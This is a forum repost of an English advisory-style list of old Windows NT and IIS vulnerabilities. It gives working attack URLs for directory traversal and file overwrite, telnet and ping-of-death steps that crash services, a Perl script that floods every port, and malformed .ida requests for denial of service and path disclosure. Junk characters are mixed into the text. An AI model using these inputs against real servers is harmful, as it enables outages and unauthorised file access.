找回密码
 注册

QQ登录

只需一步,快速开始

NT的漏洞及描述(英文)

[复制链接]
发表于 2011-1-13 17:12:25 | 显示全部楼层 |阅读模式
受影响系统:4.0,iis 1.0
4 R6 E2 d! g& N2 NA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
) y! K; w# m6 m5 G' x0 ]: n. o7 b: c/ a/ V9 l5 q$ g8 H9 |
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
; T% z$ F" [  K! M: c9 z: }6 H% ]# ^- }
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.# d/ j" ?8 ]# w7 O

6 h# v- t+ |2 F6 Y! e+ Z--------------------------------------------------------------------4 `* q3 x, l" ]2 c4 c+ x

$ q$ k9 @/ x* q" l4 E受影响系统:4.0
" w' b/ ~. h2 N$ t% `6 CA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
! P2 V- w, r' d  Y4 ]
  s- P$ K! e2 O! s* L4 r+ A  @If the file 'target.bat' exists, the file will be truncated.
7 ^0 \! `4 n( r: |; `2 w, `, y! }9 N; M8 e

, D. M5 M) d; D4 m7 zA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.5 e+ Q+ y$ }6 p  F# C
2 X3 l+ J. h" ]1 b$ [4 i
----------------------------------------------------------------------9 r5 ?) Q+ n& J: p

( D# H: ~% Y. m2 H! }% Z受影响系统:3.51,4.0; j% |: i0 P! q
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.3 [% G! i: ^$ X0 h
* L1 w  {0 ~  {4 _: _- J! i- r
The following steps;. g- V9 i) y& T) V! L

& o! O9 S4 u7 P( @Telnet to an NT 4.0 system on port 135 8 A0 ^4 Z* ]6 n  N1 R+ q
Type about 10 characters followed by a <CR>
1 J0 }8 s& B6 D4 P; B4 ^8 OExit Telnet # k1 L5 K7 F; ], D4 b
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
6 G0 o$ T$ _% [, Z& M
# Q2 F6 u9 S2 y; G! sWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.9 N7 h! J) _/ r/ V% \

3 d) e# l6 R; Z) V3 L1 e% `The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
9 @9 C" T( E' M! g
7 f$ }+ e7 u3 G0 d0 D$ sIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.# k% e! _! _8 X5 {' W- d' f/ o+ Q, O
6 B$ J6 m- U7 v+ ]" q# N! t
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
0 U9 Z" U1 ^0 _% d; r, Y6 `  [& W! o; x1 t
/*begin poke code*/
+ k- u, H2 d/ c: f; j: n. c$ D
4 z: K. N# \- e+ v9 Kuse Socket;0 T0 Q* X) M% G* o: a, @; d5 s
use FileHandle;" Q3 u( [6 X. m$ u" k/ \# ^: S4 @
require "chat2.pl";: @; K# X; P" L( e

5 ~+ U# q) f/ p+ }; T$systemname = $ARGV[0] && shift;
+ d, S' R$ B' e, x3 r
: b2 N" S' v9 l8 ?: I$ g& Q3 {$verbose = 1; # tell me what you're hitting) t+ h3 w" F6 t$ H$ X; ~# @3 N
$knownports = 1; # don't hit known problem ports! v! M, v: Y8 f+ s% L$ @
for ($port = $0; $port<65535; $port++)
( O& A* O9 e: W{
( D9 i/ i- `/ {6 T
6 C+ V  ]2 d0 m; I# D0 e8 B# o* s& T8 Q3 D3 j
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {5 V  m$ }& d1 {4 n& X: Q( }
next;
& B: D1 ]% N) `' K}5 n* e9 ]. O# n* C
$fh = chat::open_port($systemname, $port);, B( Q7 R# a" I( i8 B
chat::print ($fh,"This is about ten characters or more");9 G! v+ N5 H7 y$ A- m
if ($verbose) {) Y! a9 f# P$ q; S1 A5 m+ R
print "Trying port: $port\n";4 `/ ~1 F$ d, s7 g
} 9 ~, Y' Q8 _9 q* h. Z: K
chat::close($fh);8 N1 U( y5 q( p* |" e/ ~

: a6 r, m1 Z4 Z5 D$ ?1 F}
: ~  H; _- t/ H" `
& J. z( b9 h8 r
8 e( P5 f9 c3 @- \/*end poke code*/& _! i8 ^. X. |7 w6 o' r7 `7 o

/ c+ v. M& d# K; W" _) S! ]  xSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
' s: [4 r, t' [4 b' @
$ P: u3 u$ Z! Y--------------------------------------------------------------------------------- m$ ^: z! i5 E

# ^: c6 p- }1 y8 L8 o. D受影响系统:4.0# x: O8 N" Z9 w
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
- Z& |- e, G( l* ?8 R7 X5 b* T* ]2 y! b
This attack causes Dr. Watson to display an alert window and to log an error:
1 m( Q3 E1 M$ B  C. Q9 x/ ~! [, k" f( m- D# s
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
( o7 t8 \, o3 R* _- v7 s. C0 E. H& u0 U9 P+ `( u, v' W
--------------------------------------------------------------------------------4 g& D" R8 r* F- G6 R
9 q3 Y) o2 v2 P+ a  C# t! c
受影响系统:3.51,4.06 C9 f$ j+ F$ S. o2 B
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:7 i, ?4 [4 H$ D+ \* u: J7 A

) Y% z+ A2 u2 }/ i, HSTOP: 0X0000001E
% k, b1 o+ T5 z  }/ v6 P; {KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS& p/ g  P* k) x1 h/ L
( z8 e/ r2 ]9 R- _- i% ]! H8 `  L# E' \
-OR-
/ {7 d- E2 |6 ~; _; p" _
+ v% u" m/ ^3 i: p4 Y" {$ cSTOP: 0x0000000A
9 @2 i6 V; |: }IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS4 t& a0 o  k  h( i: S
% ~/ V" T7 K3 P" K- f+ i
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
& y8 }  P* K7 {1 ?2 P! e5 G0 e, o8 @% S
--------------------------------------------------------------------------------8 f9 M' Z, N8 h- I
2 Y' q6 l5 \* d; \& l- L" ~6 c( s
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
. `! x/ \" \5 j  `5 s% f4 s
0 X8 {+ Y* {) H. O--------------------------------------------------------
0 l- a7 ]/ n( G5 {/ l+ l) B& V' }* z7 H+ Z* B0 |8 q
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2025-4-26 06:54

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表